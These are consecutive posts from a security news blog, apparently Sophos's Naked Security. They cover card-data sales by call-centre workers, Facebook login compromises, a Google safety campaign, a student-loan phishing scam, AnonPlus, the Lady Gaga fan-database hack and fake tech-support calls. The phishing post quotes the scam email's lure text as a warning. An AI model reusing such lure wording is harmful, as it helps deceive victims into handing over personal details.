According to the Daily Mail an undercover investigation in India has uncovered that some call center workers have been selling confidential information on nearly 500,000 Britons.
Undercover reporters from The Sunday Times met with two individuals who claimed to be IT workers who offered to provide them with 45 different types of data gathered from the victims.
Information offered up included names, addresses, phone numbers and credit card details (including CCV/CVV codes and expiration dates).
The reporters allege they could purchase the records for as little as 2 pence apiece ($0.03 USD). One of the
IT workersthieves bragged:
"These [pieces of data] are ones that have been sold to somebody already. This is Barclays, this is Halifax, this is Lloyds TSB. We’ve been dealing so long we can tell the bank by just the card number."more
If you’ve an unauthorised party has logged into your Facebook account, then you’re far from alone.
New official statistics revealed by the social networking giant reveal that 0.06% of the more than billion logins that they have each day are compromised.
Put another way, that’s more than 600,000 per day – or, if you really like to make your mind melt, one every 14 milliseconds.
The statistic was revealed in an infographic published alongside an official Facebook blog post trumpeting new security features introduced by the firm.
The new security features include Trusted friends (called “Guardian angels” in the infographic). Read the rest of this entry »
Google has launched a campaign promoting online safety, in association with the UK’s Citizen’s Advice Bureau.
The campaign, which will include adverts in newspapers, on public transport and online, is being run with the hope of encouraging internet users to take more care over their online activities – including using more secure passwords, and remembering to log out of websites when they have finished using them.
Awareness campaigns about online safety like this are important, as it’s clear that most internet users are pretty clueless about how to best secure their computers and surf safely online.
This isn’t because the public is disinterested in protecting themselves, but due to the fact that many people simply don’t know where to turn, or how to translate complicated buzzwords, geek talk and terminology into simple easy-to-understand English.
So, campaigns like Google’s “Good to Know” one are a *good* thing, as they translate sometimes complicated safety advice into simple terms.
Google, of course, has an interest in people not turning their backs on the internet – it wants users to feel safer online, as that will ultimately increase the popularity of the internet and help Google grow.
To their credit, Google provides a number of technologies to help users defend their accounts from being hacked – but only a minority of users seem know about them. If you haven’t already done so, check out my advice on how to stop your Gmail account being hacked, for instance.
It’s notable that part of the “Good to Know” campaign appears designed to reassure internet users about the data that Google collects about them to provide its services.
The critical thing, however, will be what I call my “Aunty Hilda test”. If the only people who hear about this advertising campaign are people who are already techie geeks or people who work in information security then it will have failed.
If, however, my Aunty Hilda hears about the campaign – and genuinely learns something about how to protect herself online – then it truly will have succeeded.
With cybercrime and internet fraud on the increase – it’s never been more important to raise awareness and give people simple instructions on how to be safer on the net.
You can find out more about the “Good to Know” campaign atwww.google.co.uk/goodtoknow.
With British students about to start another year at university, the last thing they probably want to hear is that there is a problem with a student loan.
But that’s precisely the camouflage that online scammers are using to steal personal information today.
An email, claiming to come from Directgov UK, tells students that there is a problem with the online account for their student loan, and they need to update their account urgently.
Here’s a typical spammed-out message we’ve seen in our traps:
Student Loan Update.
Dear Student Finance Customer.
We at HM Government noticed your Student loan online log in details is incorrect and need to be updated.
DOWNLOAD THE ATTACHMENT TO UPDATE YOUR ACCOUNT NOW
Inline Verification. Directgov UK.
Student Loan Update.html
Clicking on the HTML attachment is not a good idea, however, as it will urge you to enter your details which are then sent via a website to the phishers.
Sophos products block the message as spam, and block the webpage that the HTML form is attempting to post the personal information.
Remember to always be suspicious of unsolicited attachments. Also, I would hope that a good student would have noticed the grammatical mistake in the phisher’s email..
The Anonymous hacktivist group has announced that it will launch its very own social network, to be called AnonPlus, after accounts it held with Google+ were suspended for violating terms and conditions.
Google+ has recently been enforcing a policy of shutting down profiles which contain fake names or those that represent organisations rather than individuals, so it’s not exactly surprising to see Anonymous-related profiles being zapped.
AnonPlus, Anonymous’s answer to the likes of Google+, is far from ready, however.
A team of 17 Java developers has been announced on the site’s holding page, alongside a manifesto announcing the “new social network where there is no fear of censorship” and “no more oppression”, but it seems that any working infrastructure for AnonPlus is some considerable way off still.
It’s hard not to be cynical about the prospects of a new social network being built from scratch.
Yes, Google – with all the resources it has available – appears to have done a good job with Google+, but surely the chances for a loosely-knit amateur collective like Anonymous who reject organisational constructs, will have a much steeper challenge.
Anyone remember Diaspora? They had the advantages of support from many and even some funding, but they seem to have gone awfully quiet lately, don’t they?
It will be interesting to see if AnonPlus becomes popular if/when it launches with the very people it is intended to help – those who are being prevented by oppressive regimes from sharing information freely and safely with the rest of the world.
A gang of hackers known as SwagSec announced at the tail end of last week that they had hacked into Lady Gaga’s UK website and made off with a database of names and email addresses of fans. To prove their point, they published the stolen data online.
The press reported that a source close to Lady Gaga said that she was:
"upset and hopes police get to the bottom of how this was allowed to happen"
If she was upset, she made no mention of the hack on her Twitter page, and posted no apology to her UK fans for the poor website security. She wasn’t, however, too upset to tweet about Emmy award nominations or to drop a line to Cher about doing a duet remix.
Although it’s right that the authorities should be informed regarding SwagSec’s illegal activities, there should surely be some recognition at Gaga HQ that perhaps the website was doing a lousy job at securing its fans’ information?
Lady Gaga’s record label, Universal, said it had confirmed that the hack had occurred and said that police had been informed:
"The hackers took a content database dump from http://www.ladygaga.co.uk and a section of email, first name and last name records were accessed. There were no passwords or financial information taken. We take this very seriously and have put in place additional measures to protect personally identifiable information. All those affected have been advised."
The risk to users who had their details compromised, of course, is that they could have been the subject of targeted attacks. Imagine how many of them might have opened an attachment or clicked on a link if they received an email claiming to be about free tickets for a Lady Gaga concert, or a sneak preview of her new video.
But although Universal says that it has contacted everyone who was affected – can they be confident that they know the extent of SwagSec’s hack? After all, the hack is claimed to have occurred weeks ago, but was only made public by SwagSec at the end of last week.
Wouldn’t it be more open and transparent to have a message to fans of the Lady Gaga UK website, telling them all what occurred. I went looking and couldn’t find anything to warn the wider array of Lady Gaga fans.
You may remember that the SwagSec hacking group defaced Amy Winehouse’s website earlier this month as well.
One wonders what eccentric female troubadour they will target next..
Naked Security has been hearing from our Canadian readers about more fake technical support calls trying to get people to infect themselves with fake anti-virus software, keyloggers and remote control software. That’s right, they are calling people on the telephone and trying to defraud them in numerous ways.
The fraudulent callers represent themselves as being from Microsoft, Telus (one of the traditional Canadian phone companies) and other brands believed to be trusted by the intended victims.
As we have reported previously the calls seem to originate from overseas call centres, but often use caller ID numbers that appear to be local. They likely are taking advantage of extremely cheap Voice Over IP technologies that allow them to purchase local phone numbers.
They falsely claim the user’s computer has been sending error messages to them and that they are calling to help fix their PCs. Their modus operandi varies, although the outcome is always the same: them stealing your money.
They usually offer to assist you through remote control software, often from legitimate vendors like LogMeIn. Once they are able to access your PC they will install fake anti-virus software or other malware and charge you for the privilege. This way they get two bites at the apple… Once for the technical support incident and another when you pay for the rogue security suite.
This has been common enough recently that Telus has posted an advisory on their website. Telus states that they are working with the Royal Canadian Mounted Police to trace the origin of the calls and recommend Telus customers who believe they have been defrauded call 310-2255.
A recent study by Microsoft showed that the average Canadian victim had $1560 USD stolen from their accounts. It is important to apply the same skepticism to incoming phone calls as you would apply to unsolicited emails or strangers ringing your doorbell.
Paul Ducklin and Sean Richmond of Sophos Australia recorded a podcastexplaining these scams and provide advice on how to avoid becoming a victim, I recommend listening to it and sharing it with your friends and family.
These attacks aren’t just affecting Canadians, we have had reports from Australia, the United Kingdom and the United States as well. Stay vigilant and remember, hanging up isn’t rude when someone is calling to scam you.
Thanks to Savio in SophosLabs Canada and Naked Security reader Lystra for contributing information to this story